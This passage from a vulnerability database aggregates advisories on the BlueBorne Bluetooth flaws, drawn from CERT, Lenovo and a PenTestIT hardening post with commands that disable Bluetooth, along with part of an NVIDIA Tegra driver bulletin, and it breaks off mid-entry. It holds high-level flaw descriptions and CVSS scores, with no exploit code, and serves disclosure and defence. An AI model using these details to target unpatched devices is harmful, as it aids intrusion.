2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Xiaomi Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\nView all 18 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.9 | AV:A/AC:M/Au:N/C:C/I:C/A:C \nTemporal | 6.2 | E:POC/RL:OF/RC:C \nEnvironmental | 6.2 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://www.armis.com/blueborne/#/technical>\n * <https://source.android.com/security/bulletin/2017-09-01>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>\n * <http://cwe.mitre.org/data/definitions/120.html>\n * <http://cwe.mitre.org/data/definitions/122.html>\n * <http://cwe.mitre.org/data/definitions/125.html>\n * <http://cwe.mitre.org/data/definitions/191.html>\n * <http://cwe.mitre.org/data/definitions/300.html>\n\n### Acknowledgements\n\nThese vulnerabilities were publicly disclosed by Ben Seri and Gregory Vishnepolsky of Armis. Armis acknowledges Alon Livne for the Linux RCE (CVE-2017-1000251) exploit.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2017-0781](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-0781>), [CVE-2017-0782](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-0782>), [CVE-2017-0783](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-0783>), [CVE-2017-0785](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-0785>), [CVE-2017-8628](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-8628>), [CVE-2017-14315](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-14315>), [CVE-2017-1000250](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-1000250>), [CVE-2017-1000251](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-1000251>) \n---|--- \n**Date Public:** | 2017-09-12 \n**Date First Published:** | 2017-09-12 \n**Date Last Updated: ** | 2017-11-08 20:46 UTC \n**Document Revision: ** | 56 \n", "modified": "2017-11-08T20:46:00", "published": "2017-09-12T00:00:00", "id": "VU:240311", "href": "https://www.kb.cert.org/vuls/id/240311", "type": "cert", "title": "Multiple Bluetooth implementation vulnerabilities affect many devices", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "lenovo": [{"lastseen": "2019-01-23T11:50:48", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000250", "CVE-2017-0781", "CVE-2017-0785", "CVE-2017-1000251", "CVE-2017-8628", "CVE-2017-0783", "CVE-2017-14315", "CVE-2017-0782"], "description": "**Lenovo Security Advisory**: LEN-17125\n\n**Potential Impact**: Remote code execution\n\n**Severity**: High\n\n**Scope of Impact**: Industry wide\n\n**CVE Identifier**: CVE-2017-0781, CVE-2017-0782, CVE-2017-0783, CVE-2017-0785, CVE-2017-8628, CVE-2017-14315, CVE-2017-1000250, CVE-2017-1000251\n\n**Summary Description**:\n\nA collection of Bluetooth implementation vulnerabilities known as \"BlueBorne\" have been identified that affect Windows, iOS, and Linux-kernel-based operating systems. In worst case scenarios, these vulnerabilities allow an unauthenticated attacker to perform commands on affected devices.\n\n**Mitigation Strategy for Consumers (what you should do to protect yourself):**\n\nPatches are available in the latest patch releases from Windows (see [Microsoft bulletin](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)), iOS, Linux providers, and Android (see [September 2017 security bulletin](<https://source.android.com/security/bulletin/2017-09-01>)).\n\nU.S.-based phone and other mobile device users running Android are advised to regularly check this advisory page. Due to the complexity of the U.S. mobile ecosystem, which typically requires manufacturer and carrier support to push updates, updates are in progress. Users are encouraged to accept updates to their Android device upon receiving notifications to update their operating system.\n\n \nIf an update is not available, affected users should consider disabling Bluetooth on affected devices if Bluetooth is unused or unnecessary.\n\n**Product Impact**:\n", "edition": 644, "modified": "2018-07-19T12:31:05", "published": "2018-07-19T12:31:00", "id": "LENOVO:PS500141-NOSID", "href": "https://support.lenovo.com/us/en/product_security/len-17125", "title": "Bluetooth \u201cBlueBorne\u201d Vulnerabilities - NL", "type": "lenovo", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "pentestit": [{"lastseen": "2017-09-19T10:19:42", "bulletinFamily": "blog", "cvelist": ["CVE-2017-0781", "CVE-2017-0782", "CVE-2017-0783", "CVE-2017-0785", "CVE-2017-1000250", "CVE-2017-1000251", "CVE-2017-14315", "CVE-2017-8628"], "description": "PenTestIT RSS Feed\n\nNo matter what part of the world you live in, I'm sure that you must have at least heard about the latest Bluetooth attack making rounds - **BlueBorne**. I'm also sure that if you have a vulnerable device and you have some time until your vendor releases a patch remediating this vulnerability. If this is the case, then this post is for you as this post discusses the different ways which you can perform to try and avoid being exploited with the BlueBorne Bluetooth vulnerability.\n\n![BlueBorne](http://pentestit.com/wp-content/uploads/2017/09/logo-blueborne.png)\n\n## What is BlueBorne?\n\nBlueBorne is a new, unauthenticated, set of vulnerabilities targetting multiple operating systems such as Android, iOS, Windows, and Linux, and the devices that have these operating systems installed. The name is concocted on the word \u2018airborne\u2019 as it allows unauthenticated attackers to take over devices on air-gapped networks. Additionally, this set of attacks do not require the targeted device to be set on discoverable mode or to be paired to the attacker\u2019s device. More information about these set of vulnerabilities can be found [here](<https://www.armis.com/blueborne/>).\n\n## Vulnerabilities that make up BlueBorne:\n\n * **CVE-2017-0781**: Remote code execution vulnerability affecting Android devices prior to September 9, 2017 Security Patch level \nDue to a faulty implementation of the Bluetooth Network Encapsulation Protocol (BNEP) service, a heap overflow occurs when an incorrect buffer size passed to a memcpy call. This condition allows you to execute arbitrary code and the vulnerability does not require any user interaction, authentication or pairing.\n * **CVE-2017-0782**: Remote code execution vulnerability affecting Android devices prior to September 9, 2017 Security Patch level \nA integer underflow condition exists while processing packets by the `bnep_process_control_packet()`. This memory corruption can be triggered in the Personal Area Networking (PAN) profile of BNEP service and allows you to execute arbitrary. The vulnerability does not require any user interaction, authentication or pairing.\n * **CVE-2017-0783**: A vulnerability in the PAN profile of the Bluetooth stack enables the attacker to create a network interface on the victim\u2019s device and transmit all communication over this network interface aka [man-in-the-middle](<http://pentestit.com/tag/man-in-the-middle/>). This affects all Android devices prior to September 9, 2017 Security Patch level.\n * **CVE-2017-0785**: SDP (Service Discovery Protocol) server, enables a device to identify other Bluetooth services in its range. An attacker can send crafted request packets to the target, this causes it to disclose memory bits in response packets.\n * **CVE-2017-8628:** Similar to CVE-2017-0783, this affects all versions of [Microsoft Windows](<http://pentestit.com/tag/microsoft-windows/>) from Windows Vista to Windows 10.\n * **CVE-2017-1000250**: Information leak vulnerability in the BlueZ implementation for Linux. The SDP server discloses memory bit in response packets when it receives a special crafted packet from an attacker.\n * **CVE-2017-1000251**: A memory corruption exists because of a stack overflow vulnerability in the L2CAP (Logical Link Control and Adaptation Protocol), again in BlueZ for Linux.\n * **CVE-2017-14315**: Remote code execution via Apple\u2019s Low Energy Audio Protocol (LEAP) affecting Apple iOS versions 9.3.5 and lower, and AppleTV tvOS versions 7.2.2 and lower \nAn overly large audio command sent to a targeted device causes a heap overflow due to improper validation of the received command.\n\nWith this theory about _BlueBorne_ out of the way, let's get to the crux of this post.\n\n## How to protect systems from BlueBorne attacks?\n\n 1. Microsoft Windows: Apply patches listed in the September 2017 advisory - [CVE-2017-8628 | Microsoft Bluetooth Driver Spoofing Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)\n * If you are not able to do so, you can deactivate the Bluetooth module itself. The best way to protect your Windows systems from BlueBorne attacks is by disabling the Bluetooth device from the Device Manager.\n 2. Android: If you are lucky enough you will have a supported phone which can get OTAs from your provider and upgrade to the latest [September 9, 2017 Security Patch Level](<https://source.android.com/security/bulletin/2017-09-01>). If not, you always have an option of [sideloading an OTA](<https://developers.google.com/android/ota>). Unfortunately, this patch will be available only for Nougat (7.0), Marshmallow (6.0). You also have an option of getting on a custom ROM such as [LineageOS](<https://review.lineageos.org/#/c/189415/>).\n 3. Apple: Upgrade to iOS version 10 and Apple TV versions above 7.2.2.R\n 4. *NIX: This is a bit tricky as some vendors have already released a patch and some have not. For example, [RHEL](<https://access.redhat.com/security/vulnerabilities/blueborne>) and [Debian CVE-2017-1000250](<https://security-tracker.debian.org/tracker/CVE-2017-1000250>) and [CVE-2017-1000251](<https://security-tracker.debian.org/tracker/CVE-2017-1000251>) are already available. However, if you still want to disable Bluetooth, this is how: \nUbuntu/Debian:\n \n sudo mv /etc/init/bluetooth.conf /etc/init/bluetooth.conf.disabled\n\nRun:\n \n #Disable and stop the Bluetooth service\n systemctl disable bluetooth.service\n systemctl mask bluetooth.service\n systemctl stop bluetooth.service\n #Remove Bluetooth modules\n rmmod bnep\n rmmod bluetooth\n rmmod btusb\n\nYou can even follow the RHEL SCAP Security Guide [here](<https://github.com/OpenSCAP/scap-security-guide/blob/master/RHEL/7/templates/static/bash/service_bluetooth_disabled.sh>).\n 5. Armis Labs have also released an Android [App](<https://play.google.com/store/apps/details?id=com.armis.blueborne_detector&hl=en>) \u201cBlueBorne Vulnerability Scanner\u201d to detect devices that are vulnerable to BlueBorne.\n\nThe post [How to: Protect Systems From BlueBorne Attacks?](<http://pentestit.com/protect-systems-blueborne-attacks/>) appeared first on [PenTestIT](<http://pentestit.com>).", "modified": "2017-09-14T21:22:24", "published": "2017-09-14T21:22:24", "href": "http://pentestit.com/protect-systems-blueborne-attacks/", "id": "PENTESTIT:4BD75D96F8359A3C04C87CDD1210FFCF", "title": "How to: Protect Systems From BlueBorne Attacks?", "type": "pentestit", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nvidia": [{"lastseen": "2021-02-04T16:27:18", "bulletinFamily": "software", "cvelist": ["CVE-2016-0834", "CVE-2016-2434", "CVE-2016-2491", "CVE-2016-3793", "CVE-2016-3814", "CVE-2016-3815", "CVE-2016-3847", "CVE-2016-3873", "CVE-2016-3930", "CVE-2016-6775", "CVE-2016-6776", "CVE-2016-6777", "CVE-2016-6789", "CVE-2016-6915", "CVE-2016-6916", "CVE-2016-6917", "CVE-2016-8395", "CVE-2016-8397", "CVE-2016-8400", "CVE-2016-8424", "CVE-2016-8425", "CVE-2016-8426", "CVE-2016-8427", "CVE-2016-8428", "CVE-2016-8429", "CVE-2016-8430", "CVE-2016-8449", "CVE-2016-8482", "CVE-2017-0306", "CVE-2017-0307", "CVE-2017-0325", "CVE-2017-0326", "CVE-2017-0327", "CVE-2017-0331", "CVE-2017-0332", "CVE-2017-0428", "CVE-2017-0429", "CVE-2017-1000250", "CVE-2017-1000251", "CVE-2017-14491", "CVE-2017-14492", "CVE-2017-14493", "CVE-2017-14494", "CVE-2017-14495", "CVE-2017-14496", "CVE-2017-6273"], "description": "### Vulnerability Details\n\nThe following sections summarize the vulnerabilities. Descriptions use [CWE\u2122](<https://cwe.mitre.org/>) and risk assessments follow [CVSS](<https://www.first.org/cvss/user-guide>).\n\n#### CVE-2016-2434\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVHOST` where an attacker can write an arbitrary value to an arbitrary location, which may lead to an escalation of privileges.\n\nCVSS Base Score: 9.3 \nCVSS Temporal Score: 8.4 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-8482\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVHOST` where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 9.3 \nCVSS Temporal Score: 8.4 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2017-0429\n\nNVIDIA kernel driver contains a vulnerability in the `i2c-hid` driver where an attacker has the ability to write an arbitrary value to an arbitrary location, which may lead to an escalation of privileges.\n\nCVSS Base Score: 9.3 \nCVSS Temporal Score: 8.4 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-6789\n\nNVIDIA OpenMax Component contains a vulnerability in `LIBNVOMX.SO` where an attacker has the ability to write an arbitrary value to an arbitrary location, which may lead to an escalation of privileges.\n\nCVSS Base Score: 9.3 \nCVSS Temporal Score: 8.4 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2017-0306\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVHOST` where an input buffer is copied to an output buffer without checking the size of the input buffer, which may lead to denial of service.\n\nCVSS Base Score: 9.3 \nCVSS Temporal Score: 7.8 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:R](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:R>)\n\n#### CVE-2017-0307\n\nNVIDIA Tegra kernel contains a vulnerability in DRM driver where the driver performs a calculation to determine how much memory to allocate, but an integer overflow can occur that causes less memory to be allocated than expected, which may lead to a buffer overflow possibly causing a denial of service or possible escalation of privileges.\n\nCVSS Base Score: 8.8 \nCVSS Temporal Score: 7.9 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-3847\n\nNVIDIA Tegra Kernel Driver contains a vulnerability in `NVAVP` where the buffer size allocated is incorrectly calculated for the size to be used, which could lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 8.8 \nCVSS Temporal Score: 7.9 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2017-0325\n\nNVIDIA kernel driver contains a vulnerability in the `i2c-hid` driver where an attacker has the ability to write an arbitrary value to an arbitrary location, which may lead to possible escalation of privileges.\n\nCVSS Base Score: 8.8 \nCVSS Temporal Score: 7.9 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-3814\n\nNVIDIA Kernel driver contains a vulnerability in NVIDIA camera where the buffer being overwritten is allocated to the heap portion of the memory, which may lead to denial of service.\n\nCVSS Base Score: 8.6 \nCVSS Temporal Score: 7.7 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:H/IR:H/AR:H/MAV:L/MAC:L/MPR:L/MUI:R/MS:C/MC:H/MI:H/MA:H>)\n\n#### CVE-2017-0326\n\nNVIDIA Tegra kernel driver contains a vulnerability in the Tegra Display Controller driver where an input buffer is copied to an output buffer without checking the size of the input buffer, which may lead to denial of service.\n\nCVSS Base Score: 8.5 \nCVSS Temporal Score: 7.6 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-6777\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVMAP` where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 8.4 \nCVSS Temporal Score: 7.6 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-6915, CVE-2016-6916, and CVE-2016-6917\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVHOST` where an integer overflow to buffer overflow may cause a denial of service.\n\nCVSS Base Score: 8.4 \nCVSS Temporal Score: 7.6 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-6776, CVE-2017-0428, CVE-2016-8426 and CVE-2016-8427\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVHOST` where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 8.4 \nCVSS Temporal Score: 7.6 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-6775\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVMAP` where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 8.4 \nCVSS Temporal Score: 7.6 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-0834\n\nNVIDIA OpenMax Component contains a vulnerability in the Video Decoder driver library `libnvmmlite_video.so` where a value passed from a user to the driver is not correctly validated and is used as the index to an array, which may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 8.4 \nCVSS Temporal Score: 7.3 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C>)\n\n#### CVE-2017-0327\n\nNVIDIA Tegra kernel driver contains a vulnerability in the NVIDIA crypto driver where an input buffer is copied to an output buffer without checking the size of the input buffer, which may lead to denial of service.\n\nCVSS Base Score: 8.2 \nCVSS Temporal Score: 7.4 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvbugswb.nvidia.com/NvBugs5/SWBug.aspx?bugid=1858005&cmtNo=>)\n\n#### CVE-2016-3815\n\nNVIDIA Kernel driver contains a vulnerability in NVIDIA camera where the buffer being overwritten is allocated to the stack, which may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 8.2 \nCVSS Temporal Score: 7.4 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-8425\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVHOST` where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.8 \nCVSS Temporal Score: 7.0 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-8424 and CVE-2016-8429\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVMAP` where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.8 \nCVSS Temporal Score: 7.0 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2017-0331\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVMAP` where untrusted data can change between validation and use which may lead to a denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.8 \nCVSS Temporal Score: 7.0 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-8430\n\nNVIDIA Tegra Kernel Driver contains a vulnerability in `NVHOST` that may occur when the application executes a `NULL` pointer dereference expected to be valid but is `NULL`, which may lead to a denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.8 \nCVSS Temporal Score: 7.0 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-8428\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVMAP` where there is the potential to read from or write to a memory location that is outside the intended boundary of the buffer, which may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.8 \nCVSS Temporal Score: 7.0 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-2491\n\nNVIDIA Tegra kernel driver contains a vulnerability in the NVIDIA camera kernel mode driver where a calculation to determine memory allocation improperly executes and allots less memory than needed, causing a buffer overflow, which may lead to denial of service.\n\nCVSS Base Score: 7.7 \nCVSS Temporal Score: 6.9 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-3793\n\nNVIDIA Tegra Kernel driver contains a vulnerability in the NVIDIA camera kernel driver where referencing memory after it has been freed may lead to denial of service.\n\nCVSS Base Score: 7.4 \nCVSS Temporal Score: 6.7 \nCVSS Vector: CVSS:3.0/[AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2017-6273\n\nNVIDIA ADSP Firmware contains a vulnerability in the ADSP Loader component where there is the potential to write to a memory location that is outside the intended boundary of the buffer, which may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.3 \nCVSS Temporal Score: 6.4 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L/E:U/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L/E:U/RL:O/RC:C>)\n\n#### CVE-2016-8395\n\nNVIDIA Tegra kernel driver contains a vulnerability in NVIDIA Camera where the buffer being overwritten is allocated on the stack, which may lead to a local permanent denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.2 \nCVSS Temporal Score: 6.5 \nCVSS Vector: CVSS:3.0/[AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:H/IR:H/AR:H/MAV:P/MAC:H/MPR:H/MUI:R/MS:C/MC:H/MI:H/MA:H>)\n\n#### CVE-2016-8400\n\nNVIDIA OpenMax Component contains a vulnerability in `LIBNVRM` where there is the potential to read or write a buffer using an index or pointer that references a memory location after the end of the buffer, which may lead to a denial of service or possible escalation of privileges.\n\nCVSS Base Score 7.1 \nCVSS Temporal Score 6.4 \nCVSS Vector CVSS:3.0/[AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-8449\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVMAP` where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges.\n\nCVSS Base Score: 7.0 \nCVSS Temporal Score: 6.3 \nCVSS Vector: CVSS:3.0/[AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2017-0332\n\nNVIDIA Tegra kernel driver contains a vulnerability in NVIDIA `cryptodev` where the buffer that can be overwritten is allocated in the heap portion of memory, which may lead to a denial of service or possible escalation of privileges.\n\nCVSS Base Score: 6.7 \nCVSS Temporal Score: 5.8 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C>)\n\n#### CVE-2016-3873\n\nNVIDIA Tegra Kernel Driver contains a vulnerability where the DVS Framework does not validate or incorrectly validates input that can affect the control flow or data flow of a program, which may lead to a possible escalation of privileges.\n\nCVSS Base Score: 6.5 \nCVSS Temporal Score: 5.9 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C>)\n\n#### CVE-2016-3930\n\nNVIDIA Tegra Kernel Driver contains a vulnerability in MMC Driver that may occur when the application executes a `NULL` pointer dereference expected to be valid but is `NULL`, which may lead to a denial of service or possible escalation of privileges.\n\nCVSS Base Score: 5.1 \nCVSS Temporal Score: 4.6 \nCVSS Vector: CVSS:3.0/[AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N/E:P/RL:O/RC:C>)\n\n#### CVE-2016-8397\n\nNVIDIA Tegra kernel driver contains a vulnerability in `NVMAP` where uninitialized stack memory may be leaked to the user, which may lead to possible information disclosure.\n\nCVSS Base Score: 4.3 \nCVSS Temporal Score: 3.9 \nCVSS Vector: 